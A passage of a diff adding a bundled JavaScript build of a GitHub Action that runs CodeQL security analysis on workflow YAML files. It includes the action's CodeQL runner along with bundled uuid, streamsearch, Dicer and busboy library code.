'6ba7b810-9dad-11d1-80b4-00c04fd430c8'; +exports.DNS = DNS; +const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; +exports.URL = URL; + +function _default(name, version, hashfunc) { + function generateUUID(value, namespace, buf, offset) { + if (typeof value === 'string') { + value = stringToBytes(value); + } + + if (typeof namespace === 'string') { + namespace = (0, _parse.default)(namespace); + } + + if (namespace.length !== 16) { + throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); + } // Compute hash of namespace and value, Per 4.3 + // Future: Use spread syntax when supported on all platforms, e.g. `bytes = + // hashfunc([...namespace, ... value])` + + + let bytes = new Uint8Array(16 + value.length); + bytes.set(namespace); + bytes.set(value, namespace.length); + bytes = hashfunc(bytes); + bytes[6] = bytes[6] & 0x0f | version; + bytes[8] = bytes[8] & 0x3f | 0x80; + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = bytes[i]; + } + + return buf; + } + + return (0, _stringify.default)(bytes); + } // Function#name is not settable on some platforms (#270) + + + try { + generateUUID.name = name; // eslint-disable-next-line no-empty + } catch (err) {} // For CommonJS default export support + + + generateUUID.DNS = DNS; + generateUUID.URL = URL; + return generateUUID; +} + +/***/ }), + +/***/ 5122: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function v4(options, buf, offset) { + options = options || {}; + + const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + + + rnds[6] = rnds[6] & 0x0f | 0x40; + rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = rnds[i]; + } + + return buf; + } + + return (0, _stringify.default)(rnds); +} + +var _default = v4; +exports["default"] = _default; + +/***/ }), + +/***/ 9120: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _sha = _interopRequireDefault(__nccwpck_require__(5274)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const v5 = (0, _v.default)('v5', 0x50, _sha.default); +var _default = v5; +exports["default"] = _default; + +/***/ }), + +/***/ 6900: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _regex = _interopRequireDefault(__nccwpck_require__(814)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function validate(uuid) { + return typeof uuid === 'string' && _regex.default.test(uuid); +} + +var _default = validate; +exports["default"] = _default; + +/***/ }), + +/***/ 1595: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function version(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + return parseInt(uuid.substr(14, 1), 16); +} + +var _default = version; +exports["default"] = _default; + +/***/ }), + +/***/ 950: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolcache = __importStar(__nccwpck_require__(7784)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newCodeQL() { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} +exports.newCodeQL = newCodeQL; +async function runCommand(config, args) { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function findCodeQL() { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; + } + // default to the codeql in the path + return "codeql"; +} +async function findCodeQlInToolcache() { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + return path.join(candidate.folder, "codeql"); + } + core.warning(`No CodeQL tools found in toolcache.`); + return undefined; +} +async function downloadPack(codeql) { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } + catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} +exports.downloadPack = downloadPack; +async function codeqlDatabaseCreate(codeql) { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + return database_path; +} +exports.codeqlDatabaseCreate = codeqlDatabaseCreate; +async function codeqlDatabaseAnalyze(codeql, database_path) { + var codeql_output = codeql.output || "codeql-actions.sarif"; + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } + else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", codeql.pack); + } + cmd.push(database_path, suite); + await runCommand(codeql, cmd); + return codeql_output; +} +exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; + + +/***/ }), + +/***/ 6144: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.run = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const cql = __importStar(__nccwpck_require__(950)); +/** + * The main function for the action. + * @returns {Promise} Resolves when the action is complete. + */ +async function run() { + try { + // set up codeql + var codeql = await cql.newCodeQL(); + core.debug(`CodeQL CLI found at '${codeql.path}'`); + await cql.runCommand(codeql, ["version", "--format", "terse"]); + // check yaml support + var languages = await cql.runCommandJson(codeql, [ + "resolve", + "languages", + "--format", + "json", + ]); + if (!languages.hasOwnProperty("yaml")) { + core.setFailed("CodeQL Yaml extractor not installed"); + throw new Error("CodeQL Yaml extractor not installed"); + } + // download pack + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } + else { + core.info(`Pack downloaded '${codeql.pack}'`); + } + core.info("Creating CodeQL database..."); + var database_path = await cql.codeqlDatabaseCreate(codeql); + core.info("Running CodeQL analysis..."); + var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); + core.info(`SARIF results: '${sarif}'`); + core.setOutput("sarif", sarif); + core.info("Finished CodeQL analysis"); + } + catch (error) { + // Fail the workflow run if an error occurs + if (error instanceof Error) + core.setFailed(error.message); + } +} +exports.run = run; +// eslint-disable-next-line @typescript-eslint/no-floating-promises +run(); + + +/***/ }), + +/***/ 9491: +/***/ ((module) => { + +"use strict"; +module.exports = require("assert"); + +/***/ }), + +/***/ 852: +/***/ ((module) => { + +"use strict"; +module.exports = require("async_hooks"); + +/***/ }), + +/***/ 4300: +/***/ ((module) => { + +"use strict"; +module.exports = require("buffer"); + +/***/ }), + +/***/ 2081: +/***/ ((module) => { + +"use strict"; +module.exports = require("child_process"); + +/***/ }), + +/***/ 6206: +/***/ ((module) => { + +"use strict"; +module.exports = require("console"); + +/***/ }), + +/***/ 6113: +/***/ ((module) => { + +"use strict"; +module.exports = require("crypto"); + +/***/ }), + +/***/ 7643: +/***/ ((module) => { + +"use strict"; +module.exports = require("diagnostics_channel"); + +/***/ }), + +/***/ 2361: +/***/ ((module) => { + +"use strict"; +module.exports = require("events"); + +/***/ }), + +/***/ 7147: +/***/ ((module) => { + +"use strict"; +module.exports = require("fs"); + +/***/ }), + +/***/ 3685: +/***/ ((module) => { + +"use strict"; +module.exports = require("http"); + +/***/ }), + +/***/ 5158: +/***/ ((module) => { + +"use strict"; +module.exports = require("http2"); + +/***/ }), + +/***/ 5687: +/***/ ((module) => { + +"use strict"; +module.exports = require("https"); + +/***/ }), + +/***/ 1808: +/***/ ((module) => { + +"use strict"; +module.exports = require("net"); + +/***/ }), + +/***/ 5673: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:events"); + +/***/ }), + +/***/ 4492: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:stream"); + +/***/ }), + +/***/ 7261: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:util"); + +/***/ }), + +/***/ 2037: +/***/ ((module) => { + +"use strict"; +module.exports = require("os"); + +/***/ }), + +/***/ 1017: +/***/ ((module) => { + +"use strict"; +module.exports = require("path"); + +/***/ }), + +/***/ 4074: +/***/ ((module) => { + +"use strict"; +module.exports = require("perf_hooks"); + +/***/ }), + +/***/ 3477: +/***/ ((module) => { + +"use strict"; +module.exports = require("querystring"); + +/***/ }), + +/***/ 2781: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream"); + +/***/ }), + +/***/ 5356: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream/web"); + +/***/ }), + +/***/ 1576: +/***/ ((module) => { + +"use strict"; +module.exports = require("string_decoder"); + +/***/ }), + +/***/ 9512: +/***/ ((module) => { + +"use strict"; +module.exports = require("timers"); + +/***/ }), + +/***/ 4404: +/***/ ((module) => { + +"use strict"; +module.exports = require("tls"); + +/***/ }), + +/***/ 7310: +/***/ ((module) => { + +"use strict"; +module.exports = require("url"); + +/***/ }), + +/***/ 3837: +/***/ ((module) => { + +"use strict"; +module.exports = require("util"); + +/***/ }), + +/***/ 9830: +/***/ ((module) => { + +"use strict"; +module.exports = require("util/types"); + +/***/ }), + +/***/ 1267: +/***/ ((module) => { + +"use strict"; +module.exports = require("worker_threads"); + +/***/ }), + +/***/ 9796: +/***/ ((module) => { + +"use strict"; +module.exports = require("zlib"); + +/***/ }), + +/***/ 2960: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const inherits = (__nccwpck_require__(7261).inherits) + +const StreamSearch = __nccwpck_require__(1142) + +const PartStream = __nccwpck_require__(1620) +const HeaderParser = __nccwpck_require__(2032) + +const DASH = 45 +const B_ONEDASH = Buffer.from('-') +const B_CRLF = Buffer.from('\r\n') +const EMPTY_FN = function () {} + +function Dicer (cfg) { + if (!(this instanceof Dicer)) { return new Dicer(cfg) } + WritableStream.call(this, cfg) + + if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } + + if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } + + this._headerFirst = cfg.headerFirst + + this._dashes = 0 + this._parts = 0 + this._finished = false + this._realFinish = false + this._isPreamble = true + this._justMatched = false + this._firstWrite = true + this._inHeader = true + this._part = undefined + this._cb = undefined + this._ignoreData = false + this._partOpts = { highWaterMark: cfg.partHwm } + this._pause = false + + const self = this + this._hparser = new HeaderParser(cfg) + this._hparser.on('header', function (header) { + self._inHeader = false + self._part.emit('header', header) + }) +} +inherits(Dicer, WritableStream) + +Dicer.prototype.emit = function (ev) { + if (ev === 'finish' && !this._realFinish) { + if (!this._finished) { + const self = this + process.nextTick(function () { + self.emit('error', new Error('Unexpected end of multipart data')) + if (self._part && !self._ignoreData) { + const type = (self._isPreamble ? 'Preamble' : 'Part') + self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) + self._part.push(null) + process.nextTick(function () { + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + return + } + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + } + } else { WritableStream.prototype.emit.apply(this, arguments) } +} + +Dicer.prototype._write = function (data, encoding, cb) { + // ignore unexpected data (e.g. extra trailer data after finished) + if (!this._hparser && !this._bparser) { return cb() } + + if (this._headerFirst && this._isPreamble) { + if (!this._part) { + this._part = new PartStream(this._partOpts) + if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } + } + const r = this._hparser.push(data) + if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } + } + + // allows for "easier" testing + if (this._firstWrite) { + this._bparser.push(B_CRLF) + this._firstWrite = false + } + + this._bparser.push(data) + + if (this._pause) { this._cb = cb } else { cb() } +} + +Dicer.prototype.reset = function () { + this._part = undefined + this._bparser = undefined + this._hparser = undefined +} + +Dicer.prototype.setBoundary = function (boundary) { + const self = this + this._bparser = new StreamSearch('\r\n--' + boundary) + this._bparser.on('info', function (isMatch, data, start, end) { + self._oninfo(isMatch, data, start, end) + }) +} + +Dicer.prototype._ignore = function () { + if (this._part && !this._ignoreData) { + this._ignoreData = true + this._part.on('error', EMPTY_FN) + // we must perform some kind of read on the stream even though we are + // ignoring the data, otherwise node's Readable stream will not emit 'end' + // after pushing null to the stream + this._part.resume() + } +} + +Dicer.prototype._oninfo = function (isMatch, data, start, end) { + let buf; const self = this; let i = 0; let r; let shouldWriteMore = true + + if (!this._part && this._justMatched && data) { + while (this._dashes < 2 && (start + i) < end) { + if (data[start + i] === DASH) { + ++i + ++this._dashes + } else { + if (this._dashes) { buf = B_ONEDASH } + this._dashes = 0 + break + } + } + if (this._dashes === 2) { + if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } + this.reset() + this._finished = true + // no more parts will be added + if (self._parts === 0) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } + } + if (this._dashes) { return } + } + if (this._justMatched) { this._justMatched = false } + if (!this._part) { + this._part = new PartStream(this._partOpts) + this._part._read = function (n) { + self._unpause() + } + if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } + if (!this._isPreamble) { this._inHeader = true } + } + if (data && start < end && !this._ignoreData) { + if (this._isPreamble || !this._inHeader) { + if (buf) { shouldWriteMore = this._part.push(buf) } + shouldWriteMore = this._part.push(data.slice(start, end)) + if (!shouldWriteMore) { this._pause = true } + } else if (!this._isPreamble && this._inHeader) { + if (buf) { this._hparser.push(buf) } + r = this._hparser.push(data.slice(start, end)) + if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } + } + } + if (isMatch) { + this._hparser.reset() + if (this._isPreamble) { this._isPreamble = false } else { + if (start !== end) { + ++this._parts + this._part.on('end', function () { + if (--self._parts === 0) { + if (self._finished) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } else { + self._unpause() + } + } + }) + } + } + this._part.push(null) + this._part = undefined + this._ignoreData = false + this._justMatched = true + this._dashes = 0 + } +} + +Dicer.prototype._unpause = function () { + if (!this._pause) { return } + + this._pause = false + if (this._cb) { + const cb = this._cb + this._cb = undefined + cb() + } +} + +module.exports = Dicer + + +/***/ }), + +/***/ 2032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) +const getLimit = __nccwpck_require__(1467) + +const StreamSearch = __nccwpck_require__(1142) + +const B_DCRLF = Buffer.from('\r\n\r\n') +const RE_CRLF = /\r\n/g +const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex + +function HeaderParser (cfg) { + EventEmitter.call(this) + + cfg = cfg || {} + const self = this + this.nread = 0 + this.maxed = false + this.npairs = 0 + this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) + this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) + this.buffer = '' + this.header = {} + this.finished = false + this.ss = new StreamSearch(B_DCRLF) + this.ss.on('info', function (isMatch, data, start, end) { + if (data && !self.maxed) { + if (self.nread + end - start >= self.maxHeaderSize) { + end = self.maxHeaderSize - self.nread + start + self.nread = self.maxHeaderSize + self.maxed = true + } else { self.nread += (end - start) } + + self.buffer += data.toString('binary', start, end) + } + if (isMatch) { self._finish() } + }) +} +inherits(HeaderParser, EventEmitter) + +HeaderParser.prototype.push = function (data) { + const r = this.ss.push(data) + if (this.finished) { return r } +} + +HeaderParser.prototype.reset = function () { + this.finished = false + this.buffer = '' + this.header = {} + this.ss.reset() +} + +HeaderParser.prototype._finish = function () { + if (this.buffer) { this._parseHeader() } + this.ss.matches = this.ss.maxMatches + const header = this.header + this.header = {} + this.buffer = '' + this.finished = true + this.nread = this.npairs = 0 + this.maxed = false + this.emit('header', header) +} + +HeaderParser.prototype._parseHeader = function () { + if (this.npairs === this.maxHeaderPairs) { return } + + const lines = this.buffer.split(RE_CRLF) + const len = lines.length + let m, h + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (lines[i].length === 0) { continue } + if (lines[i][0] === '\t' || lines[i][0] === ' ') { + // folded header content + // RFC2822 says to just remove the CRLF and not the whitespace following + // it, so we follow the RFC and include the leading whitespace ... + if (h) { + this.header[h][this.header[h].length - 1] += lines[i] + continue + } + } + + const posColon = lines[i].indexOf(':') + if ( + posColon === -1 || + posColon === 0 + ) { + return + } + m = RE_HDR.exec(lines[i]) + h = m[1].toLowerCase() + this.header[h] = this.header[h] || [] + this.header[h].push((m[2] || '')) + if (++this.npairs === this.maxHeaderPairs) { break } + } +} + +module.exports = HeaderParser + + +/***/ }), + +/***/ 1620: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const inherits = (__nccwpck_require__(7261).inherits) +const ReadableStream = (__nccwpck_require__(4492).Readable) + +function PartStream (opts) { + ReadableStream.call(this, opts) +} +inherits(PartStream, ReadableStream) + +PartStream.prototype._read = function (n) {} + +module.exports = PartStream + + +/***/ }), + +/***/ 1142: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/** + * Copyright Brian White. All rights reserved. + * + * @see https://github.com/mscdex/streamsearch + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + * + * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation + * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool + */ +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) + +function SBMH (needle) { + if (typeof needle === 'string') { + needle = Buffer.from(needle) + } + + if (!Buffer.isBuffer(needle)) { + throw new TypeError('The needle has to be a String or a Buffer.') + } + + const needleLength = needle.length + + if (needleLength === 0) { + throw new Error('The needle cannot be an empty String/Buffer.') + } + + if (needleLength > 256) { + throw new Error('The needle cannot have a length bigger than 256.') + } + + this.maxMatches = Infinity + this.matches = 0 + + this._occ = new Array(256) + .fill(needleLength) // Initialize occurrence table. + this._lookbehind_size = 0 + this._needle = needle + this._bufpos = 0 + + this._lookbehind = Buffer.alloc(needleLength) + + // Populate occurrence table with analysis of the needle, + // ignoring last letter. + for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var + this._occ[needle[i]] = needleLength - 1 - i + } +} +inherits(SBMH, EventEmitter) + +SBMH.prototype.reset = function () { + this._lookbehind_size = 0 + this.matches = 0 + this._bufpos = 0 +} + +SBMH.prototype.push = function (chunk, pos) { + if (!Buffer.isBuffer(chunk)) { + chunk = Buffer.from(chunk, 'binary') + } + const chlen = chunk.length + this._bufpos = pos || 0 + let r + while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } + return r +} + +SBMH.prototype._sbmh_feed = function (data) { + const len = data.length + const needle = this._needle + const needleLength = needle.length + const lastNeedleChar = needle[needleLength - 1] + + // Positive: points to a position in `data` + // pos == 3 points to data[3] + // Negative: points to a position in the lookbehind buffer + // pos == -2 points to lookbehind[lookbehind_size - 2] + let pos = -this._lookbehind_size + let ch + + if (pos < 0) { + // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool + // search with character lookup code that considers both the + // lookbehind buffer and the current round's haystack data. + // + // Loop until + // there is a match. + // or until + // we've moved past the position that requires the + // lookbehind buffer. In this case we switch to the + // optimized loop. + // or until + // the character to look at lies outside the haystack. + while (pos < 0 && pos <= len - needleLength) { + ch = this._sbmh_lookup_char(data, pos + needleLength - 1) + + if ( + ch === lastNeedleChar && + this._sbmh_memcmp(data, pos, needleLength - 1) + ) { + this._lookbehind_size = 0 + ++this.matches + this.emit('info', true) + + return (this._bufpos = pos + needleLength) + } + pos += this._occ[ch] + } + + // No match. + + if (pos < 0) { + // There's too few data for Boyer-Moore-Horspool to run, + // so let's use a different algorithm to skip as much as + // we can. + // Forward pos until + // the trailing part of lookbehind + data + // looks like the beginning of the needle + // or until + // pos == 0 + while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } + } + + if (pos >= 0) { + // Discard lookbehind buffer. + this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) + this._lookbehind_size = 0 + } else { + // Cut off part of the lookbehind buffer that has + // been processed and append the entire haystack + // into it. + const bytesToCutOff = this._lookbehind_size + pos + if (bytesToCutOff > 0) { + // The cut off data is guaranteed not to contain the needle. + this.emit('info', false, this._lookbehind, 0, bytesToCutOff) + } + + this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, + this._lookbehind_size - bytesToCutOff) + this._lookbehind_size -= bytesToCutOff + + data.copy(this._lookbehind, this._lookbehind_size) + this._lookbehind_size += len + + this._bufpos = len + return len + } + } + + pos += (pos >= 0) * this._bufpos + + // Lookbehind buffer is now empty. We only need to check if the + // needle is in the haystack. + if (data.indexOf(needle, pos) !== -1) { + pos = data.indexOf(needle, pos) + ++this.matches + if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } + + return (this._bufpos = pos + needleLength) + } else { + pos = len - needleLength + } + + // There was no match. If there's trailing haystack data that we cannot + // match yet using the Boyer-Moore-Horspool algorithm (because the trailing + // data is less than the needle size) then match using a modified + // algorithm that starts matching from the beginning instead of the end. + // Whatever trailing data is left after running this algorithm is added to + // the lookbehind buffer. + while ( + pos < len && + ( + data[pos] !== needle[0] || + ( + (Buffer.compare( + data.subarray(pos, pos + len - pos), + needle.subarray(0, len - pos) + ) !== 0) + ) + ) + ) { + ++pos + } + if (pos < len) { + data.copy(this._lookbehind, 0, pos, pos + (len - pos)) + this._lookbehind_size = len - pos + } + + // Everything until pos is guaranteed not to contain needle data. + if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } + + this._bufpos = len + return len +} + +SBMH.prototype._sbmh_lookup_char = function (data, pos) { + return (pos < 0) + ? this._lookbehind[this._lookbehind_size + pos] + : data[pos] +} + +SBMH.prototype._sbmh_memcmp = function (data, pos, len) { + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } + } + return true +} + +module.exports = SBMH + + +/***/ }), + +/***/ 727: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const { inherits } = __nccwpck_require__(7261) +const Dicer = __nccwpck_require__(2960) + +const MultipartParser = __nccwpck_require__(2183) +const UrlencodedParser = __nccwpck_require__(8306) +const parseParams = __nccwpck_require__(1854) + +function Busboy (opts) { + if (!(this instanceof Busboy)) { return new Busboy(opts) } + + if (typeof opts !== 'object') { + throw new TypeError('Busboy expected an options-Object.') + } + if (typeof opts.headers !== 'object') { + throw new TypeError('Busboy expected an options-Object with headers-attribute.') + } + if (typeof opts.headers['content-type'] !== 'string') { + throw new TypeError('Missing Content-Type-header.') + } + + const { + headers, + ...streamOptions + } = opts + + this.opts = { + autoDestroy: false, + ...streamOptions + } + WritableStream.call(this, this.opts) + + this._done = false + this._parser = this.getParserByHeaders(headers) + this._finished = false +} +inherits(Busboy, WritableStream) + +Busboy.prototype.emit = function (ev) { + if (ev === 'finish') { + if (!this._done) { + this._parser?.end() + return + } else if (this._finished) { + return + } + this._finished = true + } + WritableStream.prototype.emit.apply(this, arguments) +} + +Busboy.prototype.getParserByHeaders = function (headers) { + const parsed = parseParams(headers['content-type']) + + const cfg = { + defCharset: this.opts.defCharset, + fileHwm: this.opts.fileHwm, + headers, + highWaterMark: this.opts.highWaterMark, + isPartAFile: this.opts.isPartAFile, + limits: this.opts.limits, + parsedConType: parsed, + preservePath: this.opts.preservePath + } + + if (MultipartParser.detect.test(parsed[0])) { + return new MultipartParser(this, cfg) + } + if (UrlencodedParser.detect.test(parsed[0])) { + return new UrlencodedParser(this, cfg) + } + throw new Error('Unsupported Content-Type.') +} + +Busboy.prototype._write = function (chunk, encoding, cb) { + this._parser.write(chunk, cb) +} + +module.exports = Busboy +module.exports["default"] = Busboy +module.exports.Busboy = Busboy + +module.exports.Dicer = Dicer + + +/***/ }), + +/***/ 2183: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// TODO: +// * support 1 nested multipart level +// (see second multipart example here: +// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) +// * support limits.fieldNameSize +// -- this will require modifications to utils.parseParams + +const { Readable } = __nccwpck_require__(4492) +const { inherits } = __nccwpck_require__(7261) + +const Dicer = __nccwpck_require__(2960) + +const parseParams = __nccwpck_require__(1854) +const decodeText = __nccwpck_require__(4619) +const basename = __nccwpck_require__(8647) +const getLimit = __nccwpck_require__(1467) + +const RE_BOUNDARY = /^boundary$/i +const RE_FIELD = /^form-data$/i +const RE_CHARSET = /^charset$/i +const RE_FILENAME = /^filename$/i +const RE_NAME = /^name$/i + 